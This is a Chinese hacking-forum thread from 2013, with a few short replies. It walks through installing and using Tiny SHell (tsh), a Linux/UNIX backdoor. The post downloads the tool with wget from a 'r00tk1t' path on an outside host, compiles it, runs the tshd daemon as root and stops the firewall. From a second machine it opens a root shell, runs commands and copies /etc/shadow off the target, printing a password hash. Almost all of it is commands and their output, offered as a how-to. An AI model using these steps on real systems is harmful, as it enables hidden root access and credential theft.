切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
396 Linux/UNIX 远程控制 TSH[复制链接]
发表于 2013-1-14 12:27:45 | 显示全部楼层 |!read_mode!

控制:CENTOS
连接:UBUNTU

此神器支持linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

下载安装

  1. [root@Centos ~]# wget http://lucky.fuzzexp.org/file/r00tk1t/tsh.tar.gz
  2. --2013-01-08 11:24:29--  http://lucky.fuzzexp.org/file/r00tk1t/tsh.tar.gz
  3. Resolving lucky.fuzzexp.org... 173.245.61.123, 173.245.61.45
  4. Connecting to lucky.fuzzexp.org|173.245.61.123|:80... connected.
  5. HTTP request sent, awaiting response... 200 OK
  6. Length: 55748 (54K) [application/octet-stream]
  7. Saving to: `tsh.tar.gz'

  8. 100%[=====================================================================================================>] 55,748      82.7K/s   in 0.7s   

  9. 2013-01-08 11:24:31 (82.7 KB/s) - `tsh.tar.gz' saved [55748/55748]

  10. [root@Centos ~]# tar xf tsh.tar.gz
  11. [root@Centos ~]# cd tsh
  12. [root@Centos tsh]#
复制代码
编译 选择版本

  1. [root@Centos tsh]# make linux
  2. make                                                            \
  3.                 LDFLAGS=" -lutil"                               \
  4.                 DEFS=" -DLINUX"                                 \
  5.                 tsh tshd
  6. make[1]: Entering directory `/root/tsh'
  7. gcc -O3 -W -Wall -DLINUX -c pel.c
  8. gcc -O3 -W -Wall -DLINUX -c aes.c
  9. gcc -O3 -W -Wall -DLINUX -c sha1.c
  10. gcc -O3 -W -Wall -DLINUX -c tsh.c
  11. tsh.c: In function ‘main’:
  12. tsh.c:157: warning: pointer targets in passing argument 3 of ‘accept’ differ in signedness
  13. gcc -lutil -o tsh pel.o aes.o sha1.o tsh.o
  14. strip tsh
  15. gcc -O3 -W -Wall -DLINUX -c tshd.c
  16. tshd.c: In function ‘main’:
  17. tshd.c:148: warning: pointer targets in passing argument 3 of ‘accept’ differ in signedness
  18. gcc -lutil -o tshd pel.o aes.o sha1.o tshd.o
  19. strip tshd
  20. make[1]: Leaving directory `/root/tsh'
  21. [root@Centos tsh]#
复制代码

启动服务

  1. [root@Centos tsh]# umask 077; HOME=/var/tmp ./tshd
  2. [root@Centos tsh]# ps -ef | grep tshd
  3. root      8823     1  0 11:25 ?        00:00:00 ./tshd
  4. root      8846 27407  0 11:25 pts/4    00:00:00 grep tshd
  5. [root@Centos tsh]#
复制代码

不能隐藏进程
端口

  1. tcp        0      0 0.0.0.0:7586                0.0.0.0:*                   LISTEN      8823/./tshd         
复制代码

需要开放端口 我先关闭了我防火墙

  1. [root@Centos tsh]# service iptables stop
  2. Flushing firewall rules:                                   [  OK  ]
  3. Setting chains to policy ACCEPT: filter                    [  OK  ]
  4. Unloading iptables modules:                                [  OK  ]
  5. [root@Centos tsh]#
复制代码

连接端:UBUNTU 同样要编译
我就不编译了 直接传

  1. [root@Centos tsh]# scp tsh root@192.168.167.128:/
  2. The authenticity of host '192.168.167.128 (192.168.167.128)' can't be established.
  3. RSA key fingerprint is ad:08:7b:7a:90:7d:f1:45:82:8d:85:4e:9e:6f:6d:9e.
  4. Are you sure you want to continue connecting (yes/no)? yes
  5. Warning: Permanently added '192.168.167.128' (RSA) to the list of known hosts.
  6. root@192.168.167.128's password:
  7. tsh                                                                                                          100%   42KB  42.4KB/s   00:00   
  8. [root@Centos tsh]#
复制代码

  1. 看UBUNTU 连接

  2. 获得SHELL
复制代码
  1. root@Dis9Team:/# ./tsh Centos
  2. bash-3.2# id
  3. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
  4. bash-3.2# pwd
  5. /root/tsh
  6. bash-3.2#
复制代码

执行命令

  1. bash-3.2# exit
  2. logout
  3. root@Dis9Team:/# ./tsh Centos "ls"
  4. aes.c  aes.o          Makefile  pel.h  README  sha1.h  tsh          tshd          tshd.o  tsh.o
  5. aes.h  ChangeLog  pel.c     pel.o  sha1.c  sha1.o  tsh.c  tshd.c  tsh.h
  6. root@Dis9Team:/#
复制代码

下载文件

  1. root@Dis9Team:/# ./tsh Centos get /etc/shadow /tmp/
  2. 1033 done.
  3. root@Dis9Team:/# cat /tmp/shadow | more
  4. root:$1$Epwk.Gli$jClitYJzCSt3lnw/hqCzF.:15711:0:99999:7:::
  5. bin:*:15711:0:99999:7:::
  6. daemon:*:15711:0:99999:7:::
  7. adm:*:15711:0:99999:7:::
  8. lp:*:15711:0:99999:7:::
  9. sync:*:15711:0:99999:7:::
  10. shutdown:*:15711:0:99999:7:::
  11. halt:*:15711:0:99999:7:::
  12. mail:*:15711:0:99999:7:::
  13. news:*:15711:0:99999:7:::
复制代码

上传文件

  1. root@Dis9Team:/# ./tsh Centos put /tmp/shadow /tmp
  2. 1033 done.
  3. root@Dis9Team:/#
复制代码

查看

  1. [root@Centos tsh]# cat /tmp/shadow
  2. root:$1$Epwk.Gli$jClitYJzCSt3lnw/hqCzF.:15711:0:99999:7:::
  3. bin:*:15711:0:99999:7:::
  4. daemon:*:15711:0:99999:7:::
  5. adm:*:15711:0:99999:7:::
  6. lp:*:15711:0:99999:7:::
  7. sync:*:15711:0:99999:7:::
  8. shutdown:*:15711:0:99999:7:::
复制代码




操千曲而后晓声,观千剑而后识器。
发表于 2014-9-6 09:14:29 | 显示全部楼层
务器君觉得你碉堡了~~
考虑到主题作者的辛苦,决定站出来制止一下~~~~
认真回复上一主题后再继续本主题! 去回复


帖子内容需要消化

但是,每次都是最上面的内容,令人恼火
发表于 2014-11-11 11:19:59 | 显示全部楼层
碉堡了,从最基础的学起吧,续完发现多余的扯淡就是废话
发表于 2014-12-6 11:08:50 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽

代码区

GMT+8, 2019-12-13 18:44

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部